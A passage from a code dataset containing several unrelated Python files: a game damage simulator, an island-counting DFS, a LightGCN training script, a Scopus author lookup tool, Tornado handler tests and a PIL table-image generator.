無盡需放最後\ncham.blade_of_ruined_king(1)\ncham.lord_dominiks_regards(0)\ncham.youmuus_ghostblade(0)\ncham.duskblade(0)\ncham.edge_of_night(0)\ncham.deaths_dance(0)\ncham.the_bloodthirster(0)\ncham.essence_reaver(0)\ncham.phantom_dancer(0)\ncham.rapid_firecannon(0)\ncham.statikk_shiv(0)\ncham.infinity_edge(0)\n\n# 計算面板攻速、物理攻擊以及敵方實際物防\ncham.AS += (cham.lv - 1) * 0.03 * cham.AS\ncham.ad += (cham.lv - 1) * 3.5\nbot.armor = bot.armor*(1-cham.pen)-cham.le\n\n#調整爆擊溢出\ndef p(cham):\n if cham.crit > 1:\n return 1\n else:\n return cham.crit\n\n\nprint('總花費:{}'.format(cham.cost))\nprint('物理攻擊:{},物理致命:{},物理穿透:{},攻速:{},爆擊機率:{}'.format(cham.ad,cham.le,cham.pen,cham.AS,p(cham)))\n\nn = int(input('請輸入攻擊次數:'))\ntimes = n / cham.AS\n\n# 設計傷害函數\ndamage = 0\nnumber = 0\n\nwhile number != n:\n c = np.random.binomial(1, p(cham), size = None)\n if c == 1:\n print('第{}下爆擊了!'.format(number+1))\n if cham.ie == 1:\n damage += 2*cham.ad*0.15 \\\n +2*cham.ad*0.85*(100/(100+bot.armor)) \\\n +2*cham.ex1 * 0.15 \\\n +2*cham.ex2*0.85*(100/(100+bot.mr)) \\\n +cham.chd*health*(100/(100+bot.armor)) \\\n +cham.ex1 * (100/(100+bot.mr))\n print('第{}下傷害為{}'.format(number+1, 2*cham.ad*0.15 \\\n +2*cham.ad*0.85*(100/(100+bot.armor)) \\\n +2*cham.ex1 * 0.15 \\\n +2*cham.ex2*0.85*(100/(100+bot.mr)) \\\n +cham.chd*health*(100/(100+bot.armor)) \\\n +cham.ex1 * (100/(100+bot.mr))))\n health -= 2*cham.ad*0.15 \\\n +2*cham.ad*0.85*(100/(100+bot.armor)) \\\n +2*cham.ex1 * 0.15 \\\n +2*cham.ex2*0.85*(100/(100+bot.mr)) \\\n +cham.chd*health*(100/(100+bot.armor)) \\\n +cham.ex1 * (100/(100+bot.mr))\n if health <= 0:\n health = 0\n else:\n health += 0\n print('第{}下傷害後,敵方剩下{}血量'.format(number+1,health))\n else:\n damage += 2*cham.ad*(100/(100+bot.armor)) \\\n + cham.ex1 * (100 / (100 + bot.mr)) \\\n + 2*cham.ex2 * (100 / (100 + bot.mr)) \\\n + cham.chd * health * (100 / (100 + bot.armor))\n print('第{}下傷害為{}'.format(number + 1, 2*cham.ad*(100/(100+bot.armor)) \\\n + cham.ex1 * (100 / (100 + bot.mr)) \\\n + 2*cham.ex2 * (100 / (100 + bot.mr)) \\\n + cham.chd * health * (100 / (100 + bot.armor))))\n health -= 2*cham.ad*(100/(100+bot.armor)) \\\n + cham.ex1 * (100 / (100 + bot.mr)) \\\n + 2*cham.ex2 * (100 / (100 + bot.mr)) \\\n + cham.chd * health * (100 / (100 + bot.armor))\n if health <= 0:\n health = 0\n else:\n health += 0\n 
print('After attack {}, the enemy has {} health left'.format(number + 1, health))\n    else:\n        print('Attack {} did not crit!'.format(number + 1))\n        damage += cham.ad*(100/(100+bot.armor)) \\\n            + cham.ex1 * (100 / (100 + bot.mr)) \\\n            + cham.ex2 * (100 / (100 + bot.mr)) \\\n            + cham.chd * health * (100 / (100 + bot.armor))\n        print('Attack {} dealt {} damage'.format(number + 1, cham.ad*(100/(100+bot.armor)) \\\n            + cham.ex1 * (100 / (100 + bot.mr)) \\\n            + cham.ex2 * (100 / (100 + bot.mr)) \\\n            + cham.chd * health * (100 / (100 + bot.armor))))\n        health -= cham.ad*(100/(100+bot.armor)) \\\n            + cham.ex1 * (100 / (100 + bot.mr)) \\\n            + cham.ex2 * (100 / (100 + bot.mr)) \\\n            + cham.chd * health * (100 / (100 + bot.armor))\n        if health <= 0:\n            health = 0\n        else:\n            health += 0\n        print('After attack {}, the enemy has {} health left'.format(number + 1, health))\n\n    number += 1\n\ndps = damage / times\n\nprint('The attacks took {} seconds'.format(times))\nprint('Total damage dealt to the enemy: {}'.format(damage))\nprint('Enemy health remaining: {}'.format(health))\nprint('Damage per second: {}'.format(dps))\nprint('DPS per unit of gold: {}'.format(dps / cham.cost))","repo_name":"Yan30672/python","sub_path":"LOL/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"7668452249","text":"class Graph:\n    \n    def __init__(self, row, col, g):\n        self.ROW = row\n        self.COL = col\n        self.graph = g\n        self.islands = 0\n    \n    def MarkVisit(self, i, j): \n        self.graph[i][j] = \"2\"\n        # visit every neighbouring land cell; an early `return` here would skip\n        # the remaining directions and over-count islands\n        if i-1 >= 0 and self.graph[i-1][j] == \"1\":\n            self.MarkVisit(i-1, j)\n        if j-1 >= 0 and self.graph[i][j-1] == \"1\":\n            self.MarkVisit(i, j-1)\n        if i+1 < self.ROW and self.graph[i+1][j] == \"1\":\n            self.MarkVisit(i+1, j)\n        if j+1 < self.COL and self.graph[i][j+1] == \"1\":\n            self.MarkVisit(i, j+1)\n\n        if i-1 >= 0 and j-1 >= 0 and self.graph[i-1][j-1] == \"1\":\n            self.MarkVisit(i-1, j-1)\n        if j-1 >= 0 and i+1 < self.ROW and self.graph[i+1][j-1] == \"1\":\n            self.MarkVisit(i+1, j-1)\n        if i+1 < self.ROW and j+1 < self.COL and self.graph[i+1][j+1] == \"1\":\n            self.MarkVisit(i+1, j+1)\n        if j+1 < self.COL and i-1 >= 0 and self.graph[i-1][j+1] == \"1\":\n            self.MarkVisit(i-1, j+1)\n        return\n    \n    def countIslands(self): \n        for i in range(self.ROW):\n            for j in range(self.COL):\n                if self.graph[i][j] == \"1\":\n                    self.MarkVisit(i, j) \n                    self.islands += 1 \n    \n\n# graph = [[1, 1],\n#          [1, 1]]\n\ngraph = [[\"1\",\"1\",\"0\",\"0\",\"0\"],\n         [\"1\",\"1\",\"0\",\"0\",\"0\"],\n         [\"0\",\"0\",\"1\",\"0\",\"0\"],\n         [\"0\",\"0\",\"0\",\"1\",\"1\"]]\n\n# graph = [[\"1\",\"1\",\"1\",\"1\",\"0\"],\n#          [\"1\",\"1\",\"0\",\"1\",\"0\"],\n#          [\"1\",\"1\",\"0\",\"0\",\"0\"],\n#          [\"0\",\"0\",\"0\",\"0\",\"0\"]]\n\n# graph = [[1, 1, 1, 0, 0],\n#          [0, 1, 0, 0, 1],\n#          [1, 0, 0, 1, 1],\n#          [0, 0, 0, 0, 0],\n#          [1, 0, 1, 0, 1]]\n \n \nrow = len(graph)\ncol = len(graph[0])\n \ng = Graph(row, col, graph)\n \nprint(\"Number of islands is:\")\ng.countIslands()\nprint(g.islands)","repo_name":"varanasikalyan/ds","sub_path":"tree/island_dfs_in.py","file_name":"island_dfs_in.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"69915109992","text":"from helper import *\nfrom data_loader import *\n\nfrom model.models import *\nfrom model.lightgcn import LightGCNEngine\nfrom model.compgcn import CompGCNEngine\n\nfrom sklearn.model_selection import train_test_split\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Parser For Arguments', 
formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('-name',\t\tdefault='testrun',\t\t\t\t\thelp='Set run name for saving/restoring models')\n parser.add_argument('-model',\t\tdest='model',\t\tdefault='compgcn',\t\thelp='Model Name')\n parser.add_argument('-score_func',\tdest='score_func',\tdefault='conve',\t\thelp='Score Function for Link prediction')\n parser.add_argument('-opn', dest='opn', default='corr', help='Composition Operation to be used in CompGCN')\n\n parser.add_argument('-batch', dest='batch_size', default=128, type=int, help='Batch size')\n parser.add_argument('-gamma', type=float, default=40.0,\t\t\thelp='Margin')\n parser.add_argument('-gpu',\t\t type=str, default='0',\t\t\thelp='Set GPU Ids : Eg: For CPU = -1, For Single GPU = 0')\n parser.add_argument('-epoch',\t\tdest='max_epochs', \ttype=int, default=500, \thelp='Number of epochs')\n parser.add_argument('-l2', type=float, default=0.0,\t\t\thelp='L2 Regularization for Optimizer')\n parser.add_argument('-lr', type=float, default=0.001,\t\t\thelp='Starting Learning Rate')\n parser.add_argument('-lbl_smooth', dest='lbl_smooth',\ttype=float, default=0.1,\thelp='Label Smoothing')\n parser.add_argument('-num_workers', type=int, default=10, help='Number of processes to construct batches')\n parser.add_argument('-seed', dest='seed', default=41504, type=int, \thelp='Seed for randomization')\n\n parser.add_argument('-restore', dest='restore', action='store_true', help='Restore from the previously saved model')\n parser.add_argument('-bias', dest='bias', action='store_true', help='Whether to use bias in the model')\n\n parser.add_argument('-num_bases',\tdest='num_bases', \tdefault=-1, \ttype=int, \thelp='Number of basis relation vectors to use')\n parser.add_argument('-init_dim',\tdest='init_dim',\tdefault=100,\ttype=int,\thelp='Initial dimension size for entities and relations')\n parser.add_argument('-gcn_dim',\t \tdest='gcn_dim', \tdefault=200, \ttype=int, \thelp='Number of hidden units in GCN')\n parser.add_argument('-embed_dim',\tdest='embed_dim', \tdefault=64, type=int, \thelp='Embedding dimension to give as input to score function')\n parser.add_argument('-gcn_layer',\tdest='gcn_layer', \tdefault=1, \ttype=int, \thelp='Number of GCN Layers to use')\n parser.add_argument('-gcn_drop',\tdest='dropout', \tdefault=0.1, \ttype=float,\thelp='Dropout to use in GCN Layer')\n parser.add_argument('-hid_drop', \tdest='hid_drop', \tdefault=0.3, \ttype=float,\thelp='Dropout after GCN')\n\n # ConvE specific hyperparameters\n parser.add_argument('-hid_drop2', \tdest='hid_drop2', \tdefault=0.3, \ttype=float,\thelp='ConvE: Hidden dropout')\n parser.add_argument('-feat_drop', \tdest='feat_drop', \tdefault=0.3, \ttype=float,\thelp='ConvE: Feature Dropout')\n parser.add_argument('-k_w',\t \t dest='k_w', \t\tdefault=10, \ttype=int, \thelp='ConvE: k_w')\n parser.add_argument('-k_h',\t \t dest='k_h', \t\tdefault=20, \ttype=int, \thelp='ConvE: k_h')\n parser.add_argument('-num_filt', \tdest='num_filt', \tdefault=200, \ttype=int, \thelp='ConvE: Number of filters in convolution')\n parser.add_argument('-ker_sz', \tdest='ker_sz', \t\tdefault=7, \ttype=int, \thelp='ConvE: Kernel size to use')\n\n parser.add_argument('-logdir', dest='log_dir', default='./log/', help='Log directory')\n parser.add_argument('-config', dest='config_dir', default='./config/', help='Config directory')\n parser.add_argument('-output_dir', dest='output_dir', default='./results', help='Output directory for results')\n 
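# Hypothetical example invocation (illustrative values only; the flags are the ones defined in this file):\n    #   python run.py -name demo -score_func conve -gpu 0 -epoch 200 -pretrain\n    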
parser.add_argument('-checkpoint_dir', dest='checkpoint_dir', default='./checkpoints/', help='Output directory for model checkpoints')\n    \n    parser.add_argument('-pretrain', dest='pretrain', action='store_true', help='Whether to pretrain user embeddings with CompGCN before fitting LightGCN')\n    parser.add_argument('-bce_drop', \tdest='bce_drop', \tdefault=0, \ttype=float,\thelp='BCE: Feature Dropout')\n    parser.add_argument('-n_iter',\t \tdest='n_iter', \t\tdefault=1000, type=int, \thelp='Number of iterations for LightGCN Model')\n    parser.add_argument('-bce_iter',\t \tdest='bce_iter', \t\tdefault=1000, type=int, \thelp='Number of iterations for BCE Pretraining Model')\n    args = parser.parse_args()\n\n    if not args.restore: args.name = args.name + '_' + time.strftime('%d_%m_%Y') + '_' + time.strftime('%H:%M:%S')\n\n    set_gpu(args.gpu)\n    np.random.seed(args.seed)\n    torch.manual_seed(args.seed)\n    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n    \n    print(f\"Using device {device}.\")\n\n    if args.pretrain:\n        compgcn_model = CompGCNEngine(args)\n        compgcn_model.fit()\n        user_embeddings = compgcn_model.model.state_dict()['user_embeddings']\n        lightgcn = LightGCNEngine(args, device=device, pretrain_embs=(user_embeddings, compgcn_model.item_embed), ent2id=compgcn_model.ent2id, user2id=compgcn_model.user2id)\n    else:\n        lightgcn = LightGCNEngine(args, device=device)\n\n    lightgcn.fit(iterations=args.n_iter)\n    # lightgcn.cross_fit()\n    \n    for i in range(2, 5):\n        print(f\"Recommendations for customer: {i}\")\n        lightgcn.predict(str(i), num_recs=10)\n        print('-'*100)","repo_name":"RusheelIyer/comp_lightgcn","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"1019737871","text":"# load dependencies\nfrom elsapy.elssearch import ElsSearch\nfrom elsapy.elsclient import ElsClient\nfrom elsapy.elsdoc import AbsDoc\nimport pandas as pd\nimport json\nimport csv\nfrom datetime import datetime\n\n\ndef main():\n    print(\"Please make sure to update the config.json file with your API key, INSTOKEN, and input data file path!\")\n    print(\"input file must have a column named \\\"ID\\\"\"\n          \"(unique ID for each article), a column named \\\"title\\\"(title of the article), \"\n          \"and a column named \\\"year\\\"(publication year of the article). 
Please also observe the case!\")\n print(\"You also need to have elsapy and pandas installed to use this script\")\n\n user_input = input(\"Press Y to continue, and press any other key to exit \\n \")\n if user_input.lower() != 'y':\n exit()\n\n # read input data: a list of papers\n con_file = open(\"config.json\")\n config = json.load(con_file)\n con_file.close()\n\n input_df = pd.read_csv(config['input_file'])\n\n # create output file\n out_file_name = 'output_' + datetime.now().strftime('%Y-%m-%d-%H-%M-%S') + '.csv'\n\n error_log_name = initiate_error_log()\n\n with open(out_file_name, 'w', newline='', encoding='utf-8') as o:\n writer = csv.writer(o)\n writer.writerow(\n [\"ID\", \"original_title\", \"scp_title\", \"title_match(true/false)\", \"author_given_name\", 'author_surname',\n 'author_id'])\n\n for ID, title, year in zip(input_df['ID'], input_df['title'], input_df['year']):\n\n ## ensure correct data types\n ID = int(ID)\n title = str(title)\n year = int(year)\n\n scp_return = single_doc_processing(ID, title, year, error_log_name)\n\n if (scp_return != 'Empty set returned') \\\n and (scp_return != 'Read document failed') \\\n and (scp_return != \"No authors field in scp_doc\") \\\n and (scp_return != 'Other errors, likely query concatenation error'):\n my_authors = scp_return[0]['author']\n\n # check whether title matches\n set1 = set(title.lower().split(\" \"))\n set2 = set(scp_return[1].lower().split(\" \"))\n title_match = (set1 == set2)\n\n print('article ', str(int(ID)), ': number of authors ' + str(len(my_authors)))\n # write output\n for author_item in my_authors:\n writer.writerow([ID,\n title,\n scp_return[1],\n title_match,\n author_item['preferred-name']['ce:given-name'],\n author_item['preferred-name']['ce:surname'],\n author_item['@auid']])\n\n\ndef single_doc_processing(ID, title_str, year, error_log_name):\n \"\"\"\n Function: single_doc_processing\n :param ID: the id of the article\n :param title_str: the title\n :param year: the publication year\n :return: if processed, a dictionary called my authors, and the title retrieved from scopus\n \"\"\"\n\n # load configuration\n con_file = open(\"config.json\")\n config = json.load(con_file)\n con_file.close()\n\n # Initialize client\n client = ElsClient(config['apikey'])\n client.inst_token = config['insttoken']\n\n # try and execpt block: catch unprocessed cases\n try:\n title = '\\\"' + title_str + '\\\"'\n search_str = 'TITLE(' + title + ') ' + 'AND PUBYEAR = ' + str(year)\n print('\\n' + 'Query: ' + search_str) # allow user to visually check whether the query was correctly constructed\n\n doc_srch = ElsSearch(search_str, 'scopus')\n doc_srch.execute(client, get_all=True)\n\n if doc_srch.hasAllResults(): # retrieve the document\n my_scopus_id = doc_srch.results[0]['dc:identifier'].split(':')[1]\n scp_doc = AbsDoc(scp_id=my_scopus_id)\n\n if scp_doc.read(client):\n my_authors = scp_doc.data['authors']\n scp_title = scp_doc.title # save the retrieved title for later double checking\n if my_authors:\n return my_authors, scp_title\n else:\n print(\"No authors field in scp_doc\")\n error_log_writing(ID, \"No authors field in scp_doc\", error_log_name)\n return \"No authors field in scp_doc\"\n else:\n print(\"Read document failed.\")\n error_log_writing(ID, \"Read document failed.\", error_log_name)\n return 'Read document failed'\n else:\n print(\"Empty set returned\")\n error_log_writing(ID, \"Empty set returned\", error_log_name)\n return 'Empty set returned'\n except:\n print('Other errors, likely query 
concatenation error')\n error_log_writing(ID, 'Other errors, likely query concatenation error', error_log_name)\n return 'Other errors, likely query concatenation error'\n\n\ndef initiate_error_log():\n file_name = 'error_log_' + datetime.now().strftime('%Y-%m-%d-%H-%M-%S') + '.txt'\n file = open(file_name, 'w')\n file.close()\n return file_name\n\n\ndef error_log_writing(article_id, message, file_name):\n \"\"\"\n Function: error_log_writing\n :param article_id: the id of the article that did not get processed\n :param message: message about why this article was not processed\n :return: nothing\n \"\"\"\n error_log_file = open(file_name, 'a')\n error_log_file.write(str(article_id) + \": \" + message + '\\n')\n error_log_file.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"infoqualitylab/Scopus_author_info_tool","sub_path":"article_title_year_to_author.py","file_name":"article_title_year_to_author.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14897076649","text":"import json\nimport StringIO\nfrom mock import patch as patch_mock\n\nfrom tornado import locale\nfrom tornado.web import Application, HTTPError\nfrom tornado.curl_httpclient import CurlError\nfrom tornado.httpclient import HTTPError as ClientHTTPError\nfrom tornado.httpclient import HTTPResponse\n\nfrom brainiak.handlers import BrainiakRequestHandler\nfrom tests.tornado_cases import TornadoAsyncHTTPTestCase\n\n\nclass TestBrainiakRequestHandler(TornadoAsyncHTTPTestCase):\n\n class Handler(BrainiakRequestHandler):\n\n def get(self):\n self.finish(\"TEST\")\n expected_summary = \"GET localhost:10007 (127.0.0.1)\"\n assert self._request_summary() == expected_summary\n\n def post(self):\n if self.request.body == \"500\":\n raise NotImplementedError(\"exception message\")\n elif self.request.body == \"400\":\n raise HTTPError(400, log_message=\"testing\")\n\n def put(self, unauthorized=False):\n if self.request.body == \"unauthorized\":\n raise ClientHTTPError(401, \"http error: unauthorized, back off\")\n elif self.request.body == \"400\":\n _buffer = StringIO.StringIO()\n _buffer.write(\"Malformed query\")\n response = HTTPResponse(self.request, 400, buffer=_buffer, effective_url=\"/a\")\n raise ClientHTTPError(400, message=\"Bad request\", response=response)\n elif self.request.body == \"500\":\n raise HTTPError(500, \"Internal Virtuoso Error\")\n else:\n raise CurlError(500, \"Virtuoso Down on port 8890\")\n\n def delete(self):\n self.finalize(None)\n\n def get_app(self):\n return Application([('/', self.Handler)],\n log_function=lambda x: None)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_request_summary(self, log):\n response = self.fetch('/', method='GET')\n self.assertEqual(response.code, 200)\n self.assertTrue(response.body, \"TEST\")\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_400_error(self, log):\n response = self.fetch('/', method='POST', body=\"400\")\n expected_error_json = {\"errors\": [\"HTTP error: 400\\ntesting\"]}\n self.assertEqual(response.code, 400)\n self.assertEqual(expected_error_json, json.loads(response.body))\n\n @patch_mock(\"brainiak.utils.i18n.settings\", DEFAULT_LANG=\"en\")\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_400_client_error(self, log, settings):\n expected_error_message = [\"HTTP error: 500\\nAccess to backend 
service failed.\" +\n \" HTTP 400: Bad request.\\nResponse:\\nMalformed query\"]\n response = self.fetch('/', method='PUT', body=\"400\")\n self.assertEqual(response.code, 500)\n self.assertEqual(json.loads(response.body)[\"errors\"], expected_error_message)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_500_error(self, log):\n response = self.fetch('/', method='POST', body=\"500\")\n expected_error_json = \"HTTP error: 500\\nException:\\nTraceback\"\n response_error_json = json.loads(response.body)\n self.assertEqual(response.code, 500)\n self.assertIn(expected_error_json, response_error_json[\"errors\"][0])\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_500_client_error(self, log):\n response = self.fetch('/', method='PUT', body=\"unauthorized\")\n self.assertEqual(response.code, 500)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_500_http_error_500(self, log):\n response = self.fetch('/', method='PUT', body=\"500\")\n self.assertEqual(response.code, 500)\n\n\nclass TestUnmatchedHandler(TornadoAsyncHTTPTestCase):\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_get(self, log):\n response = self.fetch('/a/b/c/d/e', method='GET')\n self.assertEqual(response.code, 404)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_put(self, log):\n response = self.fetch('/a/b/c/d/e', method='PUT', body='xubiru')\n self.assertEqual(response.code, 404)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_post(self, log):\n response = self.fetch('/a/b/c/d/e', method='POST', body='xubiru')\n self.assertEqual(response.code, 404)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_patch(self, log):\n response = self.fetch('/a/b/c/d/e', method='PATCH', body='xubiru')\n self.assertEqual(response.code, 404)\n\n @patch_mock(\"brainiak.handlers.logger\") # log is None and breaks test otherwise\n def test_delete(self, log):\n response = self.fetch('/a/b/c/d/e', method='DELETE')\n self.assertEqual(response.code, 404)\n\n\nclass AuthenticatedAccessTestCase(TornadoAsyncHTTPTestCase):\n\n @patch_mock(\"brainiak.utils.i18n.settings\", DEFAULT_LANG=\"en\")\n def test_auth_access_with_invalid_user_returns_404(self, settings):\n response = self.fetch(\"/\", method='GET', headers={'X-Brainiak-Client-Id': '1'})\n self.assertEqual(response.code, 404)\n expected_body = {\"errors\": [u\"HTTP error: 404\\nClient-Id provided at 'X-Brainiak-Client-Id' (1) is not known\"]}\n computed_body = json.loads(response.body)\n self.assertEqual(computed_body, expected_body)\n\n def test_valid_client_id_from_another_client(self):\n response = self.fetch(\"/\", method='GET', headers={'X-Brainiak-Client-Id': 'another'})\n self.assertEqual(response.code, 200)\n\n\nclass TranslateTestCase(TornadoAsyncHTTPTestCase):\n\n class Handler(BrainiakRequestHandler):\n\n def get(self):\n locale.load_gettext_translations(directory=\"locale\", domain=\"brainiak\")\n user_locale = self.get_browser_locale()\n _ = user_locale.translate\n self.finalize(_(\"WORKING\"))\n\n def get_app(self):\n return Application([('/', self.Handler)],\n log_function=lambda x: None)\n\n @patch_mock(\"brainiak.handlers.logger\")\n def test_request_portuguese(self, mock_logger):\n headers = {\"Accept-Language\": \"pt_BR;q=0.8,en;q=0.2\"}\n response = 
self.fetch('/', method='GET', headers=headers)\n        self.assertEqual(response.code, 200)\n        self.assertTrue(response.body, \"FUNCIONANDO\")\n\n    @patch_mock(\"brainiak.handlers.logger\")\n    def test_request_default(self, mock_logger):\n        response = self.fetch('/', method='GET')\n        self.assertEqual(response.code, 200)\n        self.assertTrue(response.body, \"WORKING\")\n","repo_name":"bmentges/brainiak_api","sub_path":"tests/integration/test_brainiak_handler.py","file_name":"test_brainiak_handler.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"}
{"seq_id":"73147409513","text":"'''\nAuthor: xinyan\nDate: 2023-06-13 17:12:25\nLastEditors: xinyan\nLastEditTime: 2023-12-12 09:23:48\nDescription: file content\n'''\n\n\nimport sys\nfrom PIL import Image, ImageFont, ImageDraw\n\n\ndef get_content_pos(rec_pos:list, content:str, font:ImageFont.FreeTypeFont, align:str='center'):\n    content_list = content.split('\\n')\n    c_w, c_h = 0, 0\n    for item in content_list:\n        w, h = font.getbbox(item)[2:]\n        c_w = max(c_w, w)\n    c_h = h * len(content_list)\n    rec_width = rec_pos[2] - rec_pos[0]\n    rec_height = rec_pos[3] - rec_pos[1]\n    if align == 'center':\n        return (int(rec_pos[0]+rec_width/2-c_w/2), int(rec_pos[1]+rec_height/2-c_h/2))\n    elif align == 'right':\n        return (int(rec_pos[0]+rec_width-c_w-5), int(rec_pos[1]+rec_height/2-c_h/2))\n    elif align == 'left':\n        return (int(rec_pos[0]+5), int(rec_pos[1]+rec_height/2-c_h/2))\n\ndef get_font(font_path:str=None, font_size:int=20):\n    \"\"\"\n    Returns a font object based on the given font path and font size.\n    :param font_path: (str) The path to the font file. Default is None.\n    :param font_size: (int) The size of the font to be returned. Default is 20.\n    :return: (PIL.ImageFont.FreeTypeFont) The font object.\n    \"\"\"\n    if font_path:\n        return ImageFont.truetype(font_path, font_size)\n    else:\n        if sys.platform == 'win32':\n            return ImageFont.truetype('simhei', font_size)\n        elif sys.platform in (\"linux\", \"linux2\"):\n            return ImageFont.truetype('DejaVuSans', font_size)\n        elif sys.platform == 'darwin':\n            return ImageFont.truetype('PingFang', font_size)\n        else:\n            return ImageFont.load_default()\n\n\ndef generate_table_rec_coord(row_num:int, col_num:int, start_pos:list, margin:int=3, cell_width:int=150, cell_height:int=50,\n                             col_width_dict:dict={}, row_height_dict:dict={}, cell_merge_dict:dict={}):\n    \"\"\"\n    Generate the coordinates of each cell of the table.\n\n    :param row_num: Number of rows in the table.\n    :param col_num: Number of columns in the table.\n    :param start_pos: Starting coordinate of the table in the image.\n    :param margin: Space between cells of the table. Default is 3.\n    :param cell_width: Width of each cell. Default is 150.\n    :param cell_height: Height of each cell. Default is 50.\n    :param col_width_dict: Specify the width of individual columns. For example,\n        {0: 200} specifies the width of the first column as 200. Columns without a specified width use the default width 150.\n    :param row_height_dict: Specify the height of individual rows. For example,\n        {1: 80} specifies the height of the second row as 80. Rows without a specified height use the default height 50.\n    :param cell_merge_dict: Information on merging cells. 
For example,\n        {'0-0': [1,0], '0-1': [0, 2]} indicates that the cell at coordinate [0,0] needs to be merged,\n        by merging 1 row downward and 0 columns to the right (i.e., not merging columns);\n        the cell at coordinate [0,1] needs to be merged, by merging 0 rows downward and 2 columns to the right.\n    \"\"\"\n    def get_combined_size(index:int, combine_cnt:int, size:int, size_dict:dict, margin:int):\n        combine_size = sum(size_dict.get(idx, size) for idx in range(index, index + combine_cnt + 1)) + margin * combine_cnt\n        return combine_size if combine_cnt > 0 else size_dict.get(index, size)\n\n    def get_start_size(index:int, size:int, margin:int, size_dict:dict):\n        total_size = sum(size_dict.get(i, size) + margin for i in range(index))\n        return total_size if index else 0\n\n    rec_pos_list = []\n    skip_pos_key = []\n    max_x, max_y = 0, 0\n    for i in range(row_num):\n        for j in range(col_num):\n            pos_key = '{}-{}'.format(i, j)\n            if pos_key in skip_pos_key:\n                continue\n            x0 = start_pos[0] + get_start_size(j, cell_width, margin, col_width_dict)\n            y0 = start_pos[1] + get_start_size(i, cell_height, margin, row_height_dict)\n            row_combine, col_combine = cell_merge_dict.get(pos_key, [0,0])\n            x1 = x0 + get_combined_size(j, col_combine, cell_width, col_width_dict, margin)\n            y1 = y0 + get_combined_size(i, row_combine, cell_height, row_height_dict, margin)\n            max_x = max(max_x, x1)\n            max_y = max(max_y, y1)\n            rec_pos_list.append([x0, y0, x1, y1])\n            for t_i in range(row_combine):\n                skip_pos_key.append('{}-{}'.format(i+t_i+1, j))\n            for t_j in range(col_combine):\n                skip_pos_key.append('{}-{}'.format(i, j+t_j+1))\n            for t_i in range(row_combine):\n                for t_j in range(col_combine):\n                    skip_pos_key.append('{}-{}'.format(i+t_i+1, j+t_j+1))\n    table_pos = [start_pos[0]-margin, start_pos[1]-margin, max_x+margin, max_y+margin]\n    return rec_pos_list, table_pos\n\ndef __process_title_footnote(title_or_footnote:list, default_align:str, default_font_size:int, default_height:int, default_color:str) -> list:\n    result_list = []\n    for idx, content_dict in enumerate(title_or_footnote):\n        content_dict['font_size'] = content_dict.get('font_size', default_font_size) if idx == 0 else content_dict.get('font_size', default_font_size-10)\n        content_dict['color'] = content_dict.get('color', default_color)\n        content_dict['align'] = content_dict.get('align', default_align)\n        content_dict['height'] = content_dict.get('height', default_height) if idx == 0 else content_dict.get('height', default_height-20)\n        result_list.append(content_dict)\n    return result_list\n\ndef __get_max_width_title_footnote(title_list:list, footnote_list:list, font_path:str) -> int:\n    max_width = 0\n    for title in title_list:\n        title_font = get_font(font_path, title['font_size'])\n        max_width = max(max_width, title_font.getbbox(title['content'])[2])\n    for footnote in footnote_list:\n        footnote_font = get_font(font_path, footnote['font_size'])\n        max_width = max(max_width, footnote_font.getbbox(footnote['content'])[2])\n    return max_width\n\ndef __get_data_info(data_dict:dict, key:str, i, j, v_default, v_type):\n    if type(data_dict.get(key, v_default)) == v_type:\n        result = data_dict.get(key, v_default)\n    elif data_dict[key].get(f'{i}-{j}', None):\n        result = data_dict[key].get(f'{i}-{j}')\n    elif data_dict[key].get(f'r{i}', None):\n        result = data_dict[key].get(f'r{i}')\n    elif data_dict[key].get(f'c{j}', None):\n        result = data_dict[key].get(f'c{j}')\n    else:\n        result = v_default\n    return result\n\n\ndef __calculate_data_cell_width_height(row_num:int, data_dict:dict, font_path:str, 
cell_width:int, cell_height:int):\n    col_width_dict = {}\n    row_height_dict = {}\n    header_row = row_num - len(data_dict['content'])\n    for i, data_line in enumerate(data_dict['content']):\n        for j, data_content in enumerate(data_line):\n            data_font = get_font(font_path, __get_data_info(data_dict, 'font_size', i, j, 20, int))\n            c_w, c_h = 0, 0\n            for item in data_content.split('\\n'):\n                w, h = data_font.getbbox(item)[2:]\n                c_w = max(c_w, w)\n            c_w += 20  # apply the 20px cell padding once, not once per line\n            c_h = h * len(data_content.split('\\n')) + 20\n            row_height_dict[i + header_row] = max(row_height_dict.get(i + header_row, cell_height), c_h)\n            col_width_dict[j] = max(col_width_dict.get(j, cell_width), c_w)\n    return col_width_dict, row_height_dict\n\n\ndef generate_table_pic(row_num:int, col_num:int, title_list:list, header_dict:dict, data_dict:dict, img_path:str=None, footnote_list:list=[],\n                       cell_width:int=150, cell_height:int=50, col_width_dict:dict={}, row_height_dict:dict={}, cell_merge_dict:dict={},\n                       